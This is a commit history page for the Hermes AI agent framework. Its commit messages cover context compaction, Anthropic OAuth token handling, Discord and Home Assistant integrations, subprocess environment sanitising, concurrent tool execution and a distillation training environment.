Compare commits

...

1464 Commits

Author SHA1 Message Date
teknium1
a1a90f3f10 feat: require runway before prune-only compaction
Make prune-first compression cache-aware by accepting a prune-only
compaction only when it lands comfortably below the threshold. If pruning
merely dips under the threshold, fall through to the existing summary
compaction so we avoid frequent near-threshold recompressions.

Tests cover both the conservative fallback and the prune-only fast path.
2026-03-13 21:46:09 -07:00
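
A minimal sketch of the runway gate described above, with assumed names
(PRUNE_RUNWAY_FACTOR, estimate_tokens) and a crude character-based token
estimate standing in for real API counts:

    PRUNE_RUNWAY_FACTOR = 0.8  # prune-only result must land well below threshold

    def estimate_tokens(messages):
        # crude stand-in: roughly 4 characters per token
        return sum(len(str(m.get("content", ""))) for m in messages) // 4

    def compact(messages, threshold, prune, summarize):
        pruned = prune(messages)
        if estimate_tokens(pruned) <= threshold * PRUNE_RUNWAY_FACTOR:
            return pruned         # fast path: pruning alone leaves enough runway
        return summarize(pruned)  # merely dips under threshold: summary compaction

The margin keeps a compaction that barely clears the threshold from being
accepted, which is what caused the near-threshold recompression churn.
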
teknium1
55729670be docs: add cache-aware compaction design note 2026-03-13 21:46:03 -07:00
teyrebaz33
119bad65fc feat: prune old tool outputs before context compaction
Port the useful part of PR #588 onto current main without regressing
summary role alternation or the centralized call_llm-based summary path.

This adds a prune-first compression pass that:
- protects recent tool outputs with adaptive thresholds
- never prunes key tool outputs like read_file/memory/clarify
- skips the LLM summary call entirely when pruning alone is enough
- keeps head/tail protected windows untouched

Tests cover prune-only compaction, protected tools, and tail protection.

Co-authored-by: teyrebaz33 <hakanerten02@hotmail.com>
2026-03-13 21:21:28 -07:00
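
A rough sketch of the prune-first pass; PROTECTED_TOOLS and the window
sizes follow the commit text, but the values and message shape are
assumptions rather than the actual Hermes implementation:

    PROTECTED_TOOLS = {"read_file", "memory", "clarify"}  # never pruned
    HEAD_KEEP, TAIL_KEEP = 2, 6  # assumed sizes of the protected windows

    def prune_tool_outputs(messages, placeholder="[pruned tool output]"):
        out = list(messages)
        for i in range(HEAD_KEEP, max(HEAD_KEEP, len(out) - TAIL_KEEP)):
            m = out[i]
            if m.get("role") == "tool" and m.get("name") not in PROTECTED_TOOLS:
                out[i] = {**m, "content": placeholder}
        return out
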
teknium1
153ccbfd61 fix: strip user: prefix from Discord allowed user IDs in onboarding
Users sometimes paste Discord IDs with prefixes like 'user:123456',
'<@123456>', or '<@!123456>' from Discord's UI or third-party tools.
This caused auth failures since the allowlist contained 'user:123' but
the actual user_id from messages was just '123'.

Fixes:
- Added _clean_discord_id() helper in discord.py to strip common prefixes
- Applied sanitization at runtime when parsing DISCORD_ALLOWED_USERS env var
- Applied sanitization in hermes setup and hermes gateway setup input flows
- Handles user:, <@>, and <@!> prefix formats
2026-03-13 09:35:46 -07:00
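
A plausible sketch of the _clean_discord_id() helper for the three listed
prefix forms (the actual implementation in discord.py may differ):

    import re

    def clean_discord_id(raw: str) -> str:
        raw = raw.strip()
        if raw.startswith("user:"):
            raw = raw[len("user:"):]
        m = re.fullmatch(r"<@!?(\d+)>", raw)  # <@123> and <@!123> mention forms
        return m.group(1) if m else raw

    assert clean_discord_id("user:123456") == "123456"
    assert clean_discord_id("<@!123456>") == "123456"
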
Teknium
e8c9bcea2b fix: prevent model/provider mismatch when switching providers during active gateway (#1183)
When _update_config_for_provider() writes the new provider and base_url
to config.yaml, the gateway (which re-reads config per-message) can pick
up the change before model selection completes. This causes the old model
name (e.g. 'anthropic/claude-opus-4.6') to be sent to the new provider's
API (e.g. MiniMax), which fails.

Changes:
- _update_config_for_provider() now accepts an optional default_model
  parameter. When provided and the current model.default is empty or
  uses OpenRouter format (contains '/'), it sets a safe default model
  for the new provider.
- All setup.py callers for direct-API providers (zai, kimi, minimax,
  minimax-cn, anthropic) now pass a provider-appropriate default model.
- _setup_provider_model_selection() now validates the 'Keep current'
  choice: if the current model uses OpenRouter format and wouldn't work
  with the new provider, it warns and switches to the provider's first
  default model instead of silently keeping the incompatible name.

Reported by a user on Home Assistant whose gateway started sending
'anthropic/claude-opus-4.6' to MiniMax's API after running hermes setup.
2026-03-13 09:03:48 -07:00
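
A hedged sketch of the default_model guard; the function signature and
config keys are simplified stand-ins for the real
_update_config_for_provider():

    def update_config_for_provider(cfg: dict, provider: str, base_url: str,
                                   default_model: str | None = None) -> dict:
        cfg["provider"], cfg["base_url"] = provider, base_url
        current = cfg.get("model", {}).get("default", "")
        # OpenRouter-format names contain '/', which direct provider APIs reject
        if default_model and (not current or "/" in current):
            cfg.setdefault("model", {})["default"] = default_model
        return cfg
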
Teknium
7aea893b5a Merge pull request #1181 from NousResearch/hermes/hermes-294208e8
fix(skills): use generic example in 1password op run snippet
2026-03-13 08:56:16 -07:00
teknium1
938edc6466 fix(skills): use generic example in 1password op run snippet
Replace OPENAI_API_KEY with DB_PASSWORD to avoid implying the
skill is OpenAI-related.
2026-03-13 08:56:06 -07:00
Teknium
b8b45bfb77 feat(discord): add /thread command, auto_thread config, and media metadata fix (#1178)
- Add /thread slash command that creates a Discord thread and starts a
  new Hermes session in it. The starter message (if provided) becomes
  the first user input in the new session.
- Add discord.auto_thread config option (DISCORD_AUTO_THREAD env var):
  when enabled, every message in a text channel automatically creates
  a thread, allowing parallel isolated sessions.
- Fix Discord media method signatures to accept metadata kwarg
  (send_voice, send_image_file, send_image) — prevents TypeError
  when the base adapter passes platform metadata.
- Fix test mock isolation: add app_commands and ForumChannel to
  discord mocks so tests pass in full-suite runs.

Based on PRs #866 and #1109 by insecurejezza, modified per review:
removed /channel command (unsafe), added auto_thread feature,
made /thread dispatch new sessions.

Co-authored-by: insecurejezza <insecurejezza@users.noreply.github.com>
2026-03-13 08:52:54 -07:00
Teknium
d425901bae fix: report cronjob tool as available in hermes doctor
Set HERMES_INTERACTIVE=1 via setdefault in run_doctor() so CLI-gated
tool checks (like cronjob) see the same context as the interactive CLI.

Cherry-picked from PR #895 by @stablegenius49.

Fixes #878

Co-authored-by: stablegenius49 <stablegenius49@users.noreply.github.com>
2026-03-13 08:51:45 -07:00
Teknium
bcefc2a475 fix(skills): improve 1password skill — env var prompting, auth docs, broken examples
2026-03-13 08:47:08 -07:00
teknium1
9667c71df8 fix(skills): improve 1password skill — env var prompting, auth docs, broken examples
Follow-up to PR #883 (arceus77-7):

- Add setup.collect_secrets for OP_SERVICE_ACCOUNT_TOKEN so the skill
  prompts users to configure their token on first load
- Fix broken code examples: garbled op run export line, truncated
  secret reference in cli-examples.md
- Add Authentication Methods section documenting all 3 auth flows
  (service account, desktop app, connect server) with service account
  recommended for Hermes
- Clarify tmux pattern is only needed for desktop app flow, not
  service account token flow
- Credit original author (arceus77-7) in frontmatter
- Add DESCRIPTION.md for security/ category

Co-authored-by: arceus77-7 <arceus77-7@users.noreply.github.com>
2026-03-13 08:46:49 -07:00
Teknium
808d81f921 Merge PR #883: feat(skills): add official optional 1password skill
2026-03-13 08:45:04 -07:00
Teknium
9f676d1394 feat(skills): add bundled opencode autonomous-agent skill
Cherry-picked from PR #880 by @arceus77-7, rebased onto current main with corrections.

Adds opencode skill under skills/autonomous-ai-agents/ with:
- One-shot opencode run workflow
- Interactive/background TUI session workflow
- PR review workflow (including opencode pr command)
- Parallel work patterns
- TUI keybindings reference
- Session/cost management
- Smoke verification

Tested with OpenCode v1.2.25. Fixed /exit bug (not a valid command),
added missing flags (--file, --thinking, --variant), expanded docs.

Co-authored-by: arceus77-7 <261276524+arceus77-7@users.noreply.github.com>
2026-03-13 08:39:21 -07:00
Teknium
02a819b16e feat(delegate): add observability metadata to subagent results (#1175)
* fix: Home Assistant event filtering now closed by default

Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.

* docs: update Home Assistant integration documentation

- homeassistant.md: Fix event filtering docs to reflect closed-by-default
  behavior. Add watch_all option. Replace Python dict config example with
  YAML. Fix defaults table (was incorrectly showing 'all'). Add required
  configuration warning admonition.
- environment-variables.md: Add HASS_TOKEN and HASS_URL to Messaging section.
- messaging/index.md: Add Home Assistant to description, architecture
  diagram, platform toolsets table, and Next Steps links.

* fix(terminal): strip provider env vars from background and PTY subprocesses

Extends the env var blocklist from #1157 to also cover the two remaining
leaky paths in process_registry.py:

- spawn_local() PTY path (line 156)
- spawn_local() background Popen path (line 197)

Both were still using raw os.environ, leaking provider vars to background
processes and interactive PTY sessions. Now uses the same dynamic
_HERMES_PROVIDER_ENV_BLOCKLIST from local.py.

Explicit env_vars passed to spawn_local() still override the blocklist,
matching the existing behavior for callers that intentionally need these.

Gap identified by PR #1004 (@PeterFile).

* feat(delegate): add observability metadata to subagent results

Enrich delegate_task results with metadata from the child AIAgent:

- model: which model the child used
- exit_reason: completed | interrupted | max_iterations
- tokens.input / tokens.output: token counts
- tool_trace: per-tool-call trace with byte sizes and ok/error status

Tool trace uses tool_call_id matching to correctly pair parallel tool
calls with their results, with a fallback for messages without IDs.

Cherry-picked from PR #872 by @omerkaz, with fixes:
- Fixed parallel tool call trace pairing (was always updating last entry)
- Removed redundant 'iterations' field (identical to existing 'api_calls')
- Added test for parallel tool call trace correctness

Co-authored-by: omerkaz <omerkaz@users.noreply.github.com>

---------

Co-authored-by: omerkaz <omerkaz@users.noreply.github.com>
2026-03-13 08:07:12 -07:00
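
A sketch of the tool_call_id-based trace pairing with the positional
fallback described above; the field names are assumptions, not the actual
delegate_task result schema:

    def build_tool_trace(tool_calls, tool_results):
        by_id = {r["tool_call_id"]: r for r in tool_results if r.get("tool_call_id")}
        trace = []
        for i, call in enumerate(tool_calls):
            # prefer tool_call_id pairing; positional fallback for results without IDs
            result = by_id.get(call.get("id"))
            if result is None and i < len(tool_results):
                result = tool_results[i]
            content = str((result or {}).get("content", ""))
            trace.append({"tool": call.get("name"),
                          "bytes": len(content.encode("utf-8")),
                          "ok": result is not None and not (result or {}).get("error")})
        return trace
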
Teknium
4644f71faf Merge pull request #1173 from NousResearch/hermes/hermes-4cde5efa
fix(cron): use atomic write in save_job_output to prevent data loss on crash
2026-03-13 08:05:52 -07:00
alireza78a
9a7ed81b4b fix(cron): use atomic write in save_job_output to prevent data loss on crash
save_job_output() used bare open('w') which truncates the output file
immediately. A crash or OOM kill between truncation and the completed
write would silently wipe the job output.

Write now goes to a temp file first, then os.replace() swaps it
atomically — matching the existing save_jobs() pattern in the same file.
Preserves _secure_file() permissions and uses safe cleanup on error.

Cherry-picked from PR #874 by alireza78a, rebased onto current main
with conflict resolution and fixes:
- Kept _secure_dir/_secure_file security calls from PR #757
- Used except BaseException (not bare except) to match save_jobs pattern
- Wrapped os.unlink in try/except OSError to avoid masking errors

Co-authored-by: alireza78a <alireza78a@users.noreply.github.com>
2026-03-13 08:04:36 -07:00
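
The atomic-write pattern described above as a self-contained sketch
(the _secure_file() permission hardening is omitted):

    import os
    import tempfile

    def atomic_write(path: str, data: str) -> None:
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
        try:
            with os.fdopen(fd, "w") as f:
                f.write(data)
            os.replace(tmp, path)  # atomic swap: a crash here leaves the old file intact
        except BaseException:      # matches the save_jobs pattern noted above
            try:
                os.unlink(tmp)
            except OSError:
                pass               # don't mask the original error
            raise
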
Teknium
646b4ec533 fix(terminal): strip provider env vars from background and PTY subprocesses (#1172)
* fix: Home Assistant event filtering now closed by default

Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.

* docs: update Home Assistant integration documentation

- homeassistant.md: Fix event filtering docs to reflect closed-by-default
  behavior. Add watch_all option. Replace Python dict config example with
  YAML. Fix defaults table (was incorrectly showing 'all'). Add required
  configuration warning admonition.
- environment-variables.md: Add HASS_TOKEN and HASS_URL to Messaging section.
- messaging/index.md: Add Home Assistant to description, architecture
  diagram, platform toolsets table, and Next Steps links.

* fix(terminal): strip provider env vars from background and PTY subprocesses

Extends the env var blocklist from #1157 to also cover the two remaining
leaky paths in process_registry.py:

- spawn_local() PTY path (line 156)
- spawn_local() background Popen path (line 197)

Both were still using raw os.environ, leaking provider vars to background
processes and interactive PTY sessions. Now uses the same dynamic
_HERMES_PROVIDER_ENV_BLOCKLIST from local.py.

Explicit env_vars passed to spawn_local() still override the blocklist,
matching the existing behavior for callers that intentionally need these.

Gap identified by PR #1004 (@PeterFile).
2026-03-13 07:54:46 -07:00
Muhammet Eren Karakuş
c92507e53d fix(terminal): strip Hermes provider env vars from subprocess environment (#1157)
Terminal subprocesses inherit OPENAI_BASE_URL and other provider env
vars loaded from ~/.hermes/.env, silently misrouting external CLIs
like codex.  Build a blocklist dynamically from the provider registry
so new providers are automatically covered.  Callers that truly need
a blocked var can opt in via the _HERMES_FORCE_ prefix.

Closes #1002

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-13 07:52:03 -07:00
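
A minimal sketch of the dynamic blocklist filter, assuming the provider
registry yields env var names like OPENAI_BASE_URL; the _HERMES_FORCE_
opt-in follows the commit text:

    import os

    def build_subprocess_env(provider_env_vars: set[str]) -> dict[str, str]:
        env = {k: v for k, v in os.environ.items() if k not in provider_env_vars}
        for k, v in os.environ.items():
            if k.startswith("_HERMES_FORCE_"):  # explicit opt-in back in
                env[k[len("_HERMES_FORCE_"):]] = v
        return env
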
Teknium
4b53ecb1c7 docs: update Home Assistant integration documentation (#1170)
* fix: Home Assistant event filtering now closed by default

Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.

* docs: update Home Assistant integration documentation

- homeassistant.md: Fix event filtering docs to reflect closed-by-default
  behavior. Add watch_all option. Replace Python dict config example with
  YAML. Fix defaults table (was incorrectly showing 'all'). Add required
  configuration warning admonition.
- environment-variables.md: Add HASS_TOKEN and HASS_URL to Messaging section.
- messaging/index.md: Add Home Assistant to description, architecture
  diagram, platform toolsets table, and Next Steps links.
2026-03-13 07:45:06 -07:00
Teknium
61531396a0 fix: Home Assistant event filtering now closed by default (#1169)
Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.
2026-03-13 07:40:38 -07:00
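
The closed-by-default filter in sketch form; the option names follow the
commit, the event shape is an assumption:

    def should_forward(event: dict, watch_domains=(), watch_entities=(),
                       watch_all: bool = False) -> bool:
        if watch_all:
            return True                       # explicit opt-in to everything
        entity_id = event.get("entity_id", "")
        domain = entity_id.split(".", 1)[0]   # 'climate.living_room' -> 'climate'
        return domain in watch_domains or entity_id in watch_entities

With no filters configured, every call returns False, which is the
closed-by-default behavior the commit describes.
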
Teknium
6235fdde75 fix: raise session hygiene threshold from 50% to 85%
Session hygiene was firing at the same threshold (50%) as the agent's
own context compressor, causing premature compression on every turn
in long gateway sessions (especially Telegram).

Hygiene is a safety net for pathologically large sessions that would
cause API failures — it should NOT be doing normal compression work.
The agent's own compressor handles that during its tool loop with
accurate real token counts from the API.

Changes:
- Default hygiene threshold: 0.50 → 0.85 (fires only when truly large)
- Hygiene threshold is now independent of compression.threshold config
  (that setting controls the agent's compressor, not the pre-agent safety net)
- Removed env var override for hygiene threshold (CONTEXT_COMPRESSION_THRESHOLD
  still controls the agent's own compressor)
2026-03-13 04:17:45 -07:00
Teknium
8f8dd83443 fix: sync session_id after mid-run context compression
Critical bug: when the agent's context compressor fires during a tool
loop (_compress_context), it creates a new session_id and writes the
compressed messages there. But the gateway's session_entry still pointed
to the old session_id. On the next message, load_transcript() loaded
the stale pre-compression transcript, causing:

- Context bloat returning every turn
- Repeated compression cycles
- Loss of carefully compressed context

Fix: after run_conversation() returns, check if the agent's session_id
changed (compression split) and sync it back to the session store entry.
Also pass the effective session_id in the result dict so _handle_message
writes transcript entries to the correct session.

This affects ALL gateway adapters, not just webhook.
2026-03-13 04:14:35 -07:00
teknium1
06a5cc484c fix: improve gateway secret capture guidance message
The old message referenced 'hermes setup' which doesn't handle
skill-specific env vars. Updated to direct users to load the skill
in the local CLI (which triggers the secure prompt) or add the key
to ~/.hermes/.env manually.
2026-03-13 04:10:22 -07:00
Teknium
0157253145 Merge pull request #1152 from NousResearch/hermes/hermes-f47f71c0
feat: concurrent tool execution with ThreadPoolExecutor
2026-03-13 03:20:38 -07:00
Teknium
76a654f949 Merge pull request #912 from NousResearch/fix/packaging-bugs
fix: add missing packages to setuptools config
2026-03-13 03:15:54 -07:00
Teknium
0a88b133c2 Merge branch 'main' into fix/packaging-bugs 2026-03-13 03:15:45 -07:00
Teknium
98b55360a9 Merge pull request #1153 from NousResearch/hermes/hermes-42bc21fb
feat: secure skill env setup on load (core #688)
2026-03-13 03:14:34 -07:00
kshitijk4poor
ccfbf42844 feat: secure skill env setup on load (core #688)
When a skill declares required_environment_variables in its YAML
frontmatter, missing env vars trigger a secure TUI prompt (identical
to the sudo password widget) when the skill is loaded. Secrets flow
directly to ~/.hermes/.env, never entering LLM context.

Key changes:
- New required_environment_variables frontmatter field for skills
- Secure TUI widget (masked input, 120s timeout)
- Gateway safety: messaging platforms show local setup guidance
- Legacy prerequisites.env_vars normalized into new format
- Remote backend handling: conservative setup_needed=True
- Env var name validation, file permissions hardened to 0o600
- Redact patterns extended for secret-related JSON fields
- 12 existing skills updated with prerequisites declarations
- ~48 new tests covering skip, timeout, gateway, remote backends
- Dynamic panel widget sizing (fixes hardcoded width from original PR)

Cherry-picked from PR #723 by kshitijk4poor, rebased onto current main
with conflict resolution.

Fixes #688

Co-authored-by: kshitijk4poor <kshitijk4poor@users.noreply.github.com>
2026-03-13 03:14:04 -07:00
Teknium
c097e56142 Merge pull request #1149 from NousResearch/hermes/hermes-d28bf447
feat: Agentic On-Policy Distillation (OPD) environment
2026-03-13 03:09:43 -07:00
teknium1
ef3f3f9c08 fix: normalize dot-versioned model names for Anthropic API
anthropic/claude-opus-4.6 (OpenRouter format) was being sent as
claude-opus-4.6 to the Anthropic API, which expects claude-opus-4-6
(hyphens, not dots).

normalize_model_name() now converts dots to hyphens after stripping
the provider prefix, matching Anthropic's naming convention.

Fixes 404: 'model: claude-opus-4.6 was not found'
2026-03-13 03:08:14 -07:00
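
A simplified sketch of the normalization; the real normalize_model_name()
handles more cases (e.g. case-insensitive prefixes, per a later fix):

    def normalize_model_name(name: str) -> str:
        if name.lower().startswith("anthropic/"):
            name = name.split("/", 1)[1]
        return name.replace(".", "-")  # claude-opus-4.6 -> claude-opus-4-6

    assert normalize_model_name("anthropic/claude-opus-4.6") == "claude-opus-4-6"
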
teknium1
5d0d5b191c feat: concurrent tool execution with ThreadPoolExecutor
When the model returns multiple tool calls in a single response, they are
now executed concurrently using a thread pool instead of sequentially.
This significantly reduces wall-clock time when multiple independent tools
are batched (e.g. parallel web_search, read_file, terminal calls).

Architecture:
- _execute_tool_calls() dispatches to sequential or concurrent path
- Single tool calls and batches containing 'clarify' use sequential path
- Multiple non-interactive tools use ThreadPoolExecutor (max 8 workers)
- Results are collected and appended to messages in original order
- _invoke_tool() extracted as shared tool invocation helper

Safety:
- Pre-flight interrupt check skips all tools if interrupted
- Per-tool exception handling: one failure doesn't crash the batch
- Result truncation (100k char limit) applied per tool
- Budget pressure injection after all tools complete
- Checkpoints taken before file-mutating tools
- CLI spinner shows batch progress, then per-tool completion messages

Tests: 10 new tests covering dispatch logic, ordering, error handling,
interrupt behavior, truncation, and _invoke_tool routing.
2026-03-13 02:51:51 -07:00
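
A condensed sketch of the dispatch logic; calls are assumed to be dicts
with a 'name' key, and the safety machinery (interrupt checks,
checkpoints, truncation, budget injection) is omitted:

    from concurrent.futures import ThreadPoolExecutor

    MAX_WORKERS = 8

    def execute_tool_calls(calls, invoke_tool):
        # sequential path: single call, or batch contains interactive 'clarify'
        if len(calls) == 1 or any(c["name"] == "clarify" for c in calls):
            return [invoke_tool(c) for c in calls]
        with ThreadPoolExecutor(max_workers=min(MAX_WORKERS, len(calls))) as pool:
            futures = [pool.submit(invoke_tool, c) for c in calls]
        results = []
        for call, fut in zip(calls, futures):  # results kept in original order
            try:
                results.append(fut.result())
            except Exception as exc:           # one failure doesn't crash the batch
                results.append(f"Error in {call['name']}: {exc}")
        return results
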
teknium1
1a5f31d631 feat: add agentic on-policy distillation (OPD) environment
First Atropos environment to populate distill_token_ids / distill_logprobs
on ScoredDataGroup, enabling on-policy distillation training.

Based on OpenClaw-RL (Princeton, arXiv:2603.10165):
- Extracts hindsight hints from next-state signals (tool results, errors)
- Uses LLM judge with majority voting for hint extraction
- Scores student tokens under hint-enhanced distribution via get_logprobs
- Packages teacher's top-K predictions as distillation targets

Architecture:
- AgenticOPDEnv extends HermesAgentBaseEnv
- Overrides collect_trajectories to add OPD pipeline after standard rollouts
- Uses Atropos's built-in get_logprobs (VLLM prompt_logprobs) for teacher scoring
- No external servers needed — same VLLM backend handles both rollouts and scoring

Task: Coding problems with test verification (8 built-in tasks, HF dataset support)
Reward: correctness (0.7) + efficiency (0.15) + tool usage (0.15)
OPD: Per-turn hint extraction → enhanced prompt → teacher top-K logprobs

Configurable: opd_enabled, distill_topk, prm_votes, hint truncation length
Metrics: opd/mean_hints_per_rollout, opd/mean_turns_scored, opd/hint_rate
2026-03-13 02:45:08 -07:00
Teknium
34c8a5fe8b Merge pull request #1147 from NousResearch/hermes/hermes-6ec3b1a9
fix: separate Anthropic OAuth tokens from API keys
2026-03-13 02:13:47 -07:00
kshitijk4poor
bb3f5ed32a fix: separate Anthropic OAuth tokens from API keys
Persist OAuth/setup tokens in ANTHROPIC_TOKEN instead of ANTHROPIC_API_KEY.
Reserve ANTHROPIC_API_KEY for regular Console API keys.

Changes:
- anthropic_adapter: reorder resolve_anthropic_token() priority —
  ANTHROPIC_TOKEN first, ANTHROPIC_API_KEY as legacy fallback
- config: add save_anthropic_oauth_token() / save_anthropic_api_key() helpers
  that clear the opposing slot to prevent priority conflicts
- config: show_config() prefers ANTHROPIC_TOKEN for display
- setup: OAuth login and pasted setup-tokens write to ANTHROPIC_TOKEN
- setup: API key entry writes to ANTHROPIC_API_KEY and clears ANTHROPIC_TOKEN
- main: same fixes in _run_anthropic_oauth_flow() and _model_flow_anthropic()
- main: _has_any_provider_configured() checks ANTHROPIC_TOKEN
- doctor: use _is_oauth_token() for correct auth method validation
- runtime_provider: updated error message
- run_agent: simplified client init to use resolve_anthropic_token()
- run_agent: updated 401 troubleshooting messages
- status: prefer ANTHROPIC_TOKEN in status display
- tests: updated priority test, added persistence helper tests

Cherry-picked from PR #1141 by kshitijk4poor, rebased onto current main
with unrelated changes (web_policy config, blocklist CLI) removed.

Co-authored-by: kshitijk4poor <kshitijk4poor@users.noreply.github.com>
2026-03-13 02:09:52 -07:00
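
The reordered priority as a sketch; the real resolve_anthropic_token()
also auto-discovers Claude Code credential files:

    import os

    def resolve_anthropic_auth():
        token = os.environ.get("ANTHROPIC_TOKEN")  # OAuth/setup token, first priority
        if token:
            return token, "bearer"
        key = os.environ.get("ANTHROPIC_API_KEY")  # Console API key, legacy fallback
        if key:
            return key, "x-api-key"
        return None, None
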
teknium1
f562d97f13 Enhance CLI output formatting with RichText support
- Updated command output handling to use RichText for ANSI formatting.
- Improved response display in chat console with RichText integration.
- Ensured fallback for empty command outputs with a clear message.
2026-03-13 02:05:30 -07:00
Teknium
31afb31108 Merge pull request #1135 from NousResearch/hermes/hermes-6ec3b1a9
feat(skills): add NeuroSkill BCI integration as optional built-in skill
2026-03-13 01:49:00 -07:00
teknium1
8a3e7e15c6 feat(skills): add NeuroSkill BCI integration as optional built-in skill
Complete rewrite of the neuroskill-bci skill based on actual source material
from the NeuroSkill desktop app and NeuroLoop CLI repos. Supersedes PR #708.

Key improvements over #708:
- All CLI commands verified against actual NeuroSkill/NeuroLoop source
- Added --json flag usage throughout (critical for reliable parsing)
- Fixed metric formulas: Focus = σ(β/(α+θ)), Relaxation = σ(α/(β+θ))
- Scores are 0-1 scale (not 0-100 as in #708)
- Added all 40+ metrics: FAA, TAR, BAR, TBR, APF, SNR, coherence,
  consciousness (LZC, wakefulness, integration), complexity (PE, HFD, DFA),
  cardiac (RMSSD, SDNN, pNN50, LF/HF, stress index, SpO2),
  motion (stillness, blinks, jaw clenches, nods, shakes)
- Added all missing CLI subcommands: session, search-labels, interactive,
  listen, umap, calibrate, timer, notify, raw
- Protocols sourced from actual NeuroLoop protocol repertoire (70+)
  organized by category (attention, stress, emotional, sleep, somatic,
  digital, dietary, motivation)
- Added full WebSocket/HTTP API reference with all endpoints and
  JSON response formats
- Fixed gamma range: 30-50 Hz (not 30-100)
- Added signal quality per electrode with thresholds
- Added composite state patterns (flow, fatigue, anxiety, creative, etc.)
- Added ZUNA embedding documentation
- Placed as optional built-in skill (not bundled by default)

Files:
- optional-skills/health/DESCRIPTION.md (new category)
- optional-skills/health/neuroskill-bci/SKILL.md (main skill)
- optional-skills/health/neuroskill-bci/references/metrics.md
- optional-skills/health/neuroskill-bci/references/protocols.md
- optional-skills/health/neuroskill-bci/references/api.md

Refs: #694, #708
2026-03-12 21:56:07 -07:00
Teknium
d24bcad90b fix: Anthropic OAuth — beta header, token refresh, config contamination, reauthentication (#1132)
Fixes Anthropic OAuth/subscription authentication end-to-end:

Auth failures (401 errors):
- Add missing 'claude-code-20250219' beta header for OAuth tokens. Both
  clawdbot and OpenCode include this alongside 'oauth-2025-04-20' — without
  it, Anthropic's API rejects OAuth tokens with 401 authentication errors.
- Fix _fetch_anthropic_models() to use canonical beta headers from
  _COMMON_BETAS + _OAUTH_ONLY_BETAS instead of hardcoding.

Token refresh:
- Add _refresh_oauth_token() — when Claude Code credentials from
  ~/.claude/.credentials.json are expired but have a refresh token,
  automatically POST to console.anthropic.com/v1/oauth/token to get
  a new access token. Uses the same client_id as Claude Code / OpenCode.
- Add _write_claude_code_credentials() — writes refreshed tokens back
  to ~/.claude/.credentials.json, preserving other fields.
- resolve_anthropic_token() now auto-refreshes expired tokens before
  returning None.

Config contamination:
- Anthropic's _model_flow_anthropic() no longer saves base_url to config.
  Since resolve_runtime_provider() always hardcodes Anthropic's URL, the
  stale base_url was contaminating other providers when users switched
  without re-running 'hermes model' (e.g., Codex hitting api.anthropic.com).
- _update_config_for_provider() now pops base_url when passed empty string.
- Same fix in setup.py.

Flow/UX (hermes model command):
- CLAUDE_CODE_OAUTH_TOKEN env var now checked in credential detection
- Reauthentication option when existing credentials found
- run_oauth_setup_token() runs 'claude setup-token' as interactive
  subprocess, then auto-detects saved credentials
- Clean has_creds/needs_auth flow in both main.py and setup.py

Tests (14 new):
- Beta header assertions for claude-code-20250219
- Token refresh: successful refresh with credential writeback, failed
  refresh returns None, no refresh token returns None
- Credential writeback: new file creation, preserving existing fields
- Auto-refresh integration in resolve_anthropic_token()
- CLAUDE_CODE_OAUTH_TOKEN fallback, credential file auto-discovery
- run_oauth_setup_token() (5 scenarios)
2026-03-12 20:45:50 -07:00
Teknium
6ceae61a56 Merge pull request #1130 from NousResearch/hermes/hermes-c877bdeb
fix(anthropic): skip thinking params for Haiku models
2026-03-12 19:35:13 -07:00
teknium1
638136e353 fix(anthropic): skip thinking params for Haiku models
Haiku models don't support extended thinking at all. Without this
guard, claude-haiku-4-5-20251001 would receive type=enabled +
budget_tokens and return a 400 error.

Incorporates the fix from PR #1127 (by frizynn) on top of #1128's
adaptive thinking refactor.

Verified live with Claude Code OAuth:
  claude-opus-4-6       → adaptive thinking ✓
  claude-haiku-4-5      → no thinking params ✓
  claude-sonnet-4       → enabled thinking ✓
2026-03-12 19:34:55 -07:00
Teknium
8de14c5624 fix(doctor): treat configured honcho as available (#962)
2026-03-12 19:34:37 -07:00
PeterFile
2a1f92ef4a fix(doctor): treat configured honcho as available
Doctor-only override so honcho shows as available when configured,
even outside a live agent session. Runtime tool gate unchanged.

Cherry-picked from PR #962 by PeterFile, rebased onto current main
(post-#736 merge) with conflict resolution.

Fixes #961

Co-authored-by: PeterFile <PeterFile@users.noreply.github.com>
2026-03-12 19:34:19 -07:00
Teknium
15911d70c0 Merge pull request #1128 from ASRagab/fix/adaptive-thinking-budget-tokens
fix: use adaptive thinking without budget_tokens for Claude 4.6 models
2026-03-12 19:32:46 -07:00
Ahmad Ragab
3dc148ab6f fix: use adaptive thinking without budget_tokens for Claude 4.6 models
For Claude 4.6 models (Opus and Sonnet), the Anthropic API rejects
budget_tokens when thinking.type is 'adaptive'. This was causing a
400 error: 'thinking.adaptive.budget_tokens: Extra inputs are not
permitted'.

Changes:
- Send thinking: {type: 'adaptive'} without budget_tokens for 4.6
- Move effort control to output_config: {effort: ...} per Anthropic docs
- Map Hermes effort levels to Anthropic effort levels (xhigh->max, etc.)
- Narrow adaptive detection to 4.6 models only (4.5 still uses manual)
